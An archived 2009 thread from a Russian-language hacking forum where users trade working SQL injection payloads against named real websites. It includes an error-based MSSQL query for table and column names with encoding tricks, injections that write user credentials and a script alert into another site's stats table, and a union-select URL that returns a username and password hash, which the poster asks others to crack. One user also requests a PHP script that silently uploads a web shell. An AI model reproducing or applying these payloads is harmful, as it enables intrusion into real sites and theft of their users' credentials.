ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.03.2009, 19:38
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20in formation_schema.columns%20WHERE%20TABLE_NAME='all _logins')--
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 3: Incorrect syntax near 'all_logins'.
1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20in formation_schema.columns%20WHERE%20TABLE_NAME=char (97)+char(108)+char(108)+char(95)+char(108)+char(1 11)+char(103)+char(105)+char(110)+char(115))--
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 3: Incorrect syntax near 'char'.
как решить?) |
|
|
03.03.2009, 19:39
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Micr0b:
есть, например %27, но тогда нет ошибки mysql, т.е. ошибку можно вызвать только когда кавычка в чистом виде, нет ошибки - нет скули
ЗЫЖ По идее 
Последний раз редактировалось Pashkela; 03.03.2009 в 20:03..
|
|
|
|
03.03.2009, 20:02
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2Pashkela
если ты это мне то 1+or+1=@@version выводит
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
вывел все таблицы а столбцы не получается из за выше написанного(
а скуль это внедрение и выполнение sql-кода) а не ошибки выполнение скрипта)
зы. вроде правильно) |
|
|
|
03.03.2009, 20:04
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Нужен скриптик на пхп
Чтобы когда зашол на страницу то заметно заливался шелл на сайт
путь до сайта знаю
up
|
|
|
|
03.03.2009, 20:07
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от j0ker13
1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20in formation_schema.columns%20WHERE%20TABLE_NAME='all _logins')--
1+or+1=(SELECT%20TOP%201%20column_name%20FROM%20in formation_schema.columns%20WHERE%20TABLE_NAME=char (97)+char(108)+char(108)+char(95)+char(108)+char(1 11)+char(103)+char(105)+char(110)+char(115))--
как решить?)
Чарить надо так:
char(97)%2Bchar(108)%2Bchar(108)%2Bchar(95)%2Bchar (108)%2Bchar(111)%2Bchar(103)%2Bchar(105)%2Bchar(1 10)%2Bchar(115)
|
|
|
|
03.03.2009, 20:15
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2R1dex
спс) работает) а для общего развития можешь обьяснить почему так "заработало"?)
|
|
|
|
03.03.2009, 20:18
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от j0ker13
2R1dex
спс) работает) а для общего развития можешь обьяснить почему так "заработало"?)
Просто + в урле - это пробел, %2B - это +
--------
Лудше переводи в число (в твоем случае - 0x616c6c205f6c6f67696e73) - так короче запрос получается
Последний раз редактировалось BlackSun; 03.03.2009 в 20:20..
|
|
|
|
03.03.2009, 20:21
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Нужен скриптик на пхп
Чтобы когда зашол на страницу то заметно заливался шелл на сайт
путь до сайта знаю
Ты толком можешь объяснить? Через что заливать? Инъекция? Файл_прив включен? Толку с того, что путь знаешь...
|
|
|
|
03.03.2009, 20:36
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от Micr0b
AkyHa_MaTaTa>> ну ти прав на що того что кавычки слешыруюца.. но насколько помню есть обход.. я вот только прызабыл где то я ето видел вот и выклал скуль чтоб ктото может поможет).
а вот нифига я и не прав, твой сайт у меня не открываеться,приведу пример на другом,
судя по всему слеш добавляеться после, уязвимый запрос наверно идет в стату судя по возврашаемой ошибке(убераем слеши):
UPDATE gmm_fb_whoisonline SET time='1236096331', what='Sv:VPS', do= '', task= '', link= '/index.php?option=com_fireboard&func=view&catid=7&i d=20315'(сдесь возможен иньект), func= 'view'
WHERE userid='0' AND userip='70.***.66.***'
то есть например вот так можно вставить в стату пароль и хеш пользователя:
PHP код:
http://www.greenmeanmachine.com/index.php?option=com_fireboard&func=view&catid=7&id=20315',link=(select/**/concat_ws(0x3A,username,password)/**/from/**/gmm_users/**/limit/**/1)/**/WHERE/**/userid/**/LIKE/**/'%%'/*
или javascript
PHP код:
http://www.greenmeanmachine.com/index.php?option=com_fireboard&func=view&catid=7&id=20315',link=0x27223e3c7363726970743e616c657274282727293c2f7363726970743e/**/WHERE/**/userid/**/LIKE/**/'%%'/*
правдо я хз как оно там дальше выводиться в стате, может скрипты режуться.
Последний раз редактировалось AkyHa_MaTaTa; 03.03.2009 в 20:38..
|
|
|
|
03.03.2009, 20:39
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от Assembler
http://www.turistka.ru/altai/mail.php?firm=-1%20union%20select%20username,user_password,3,4%20 from%20bb_users%20limit%201,1--
SAN
d32f227fabf9c471fcceb0f12d8a626d (Нужно расшифровать с меня +_)
pr 4
Хеши не тут расшифровывать..
sss113
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
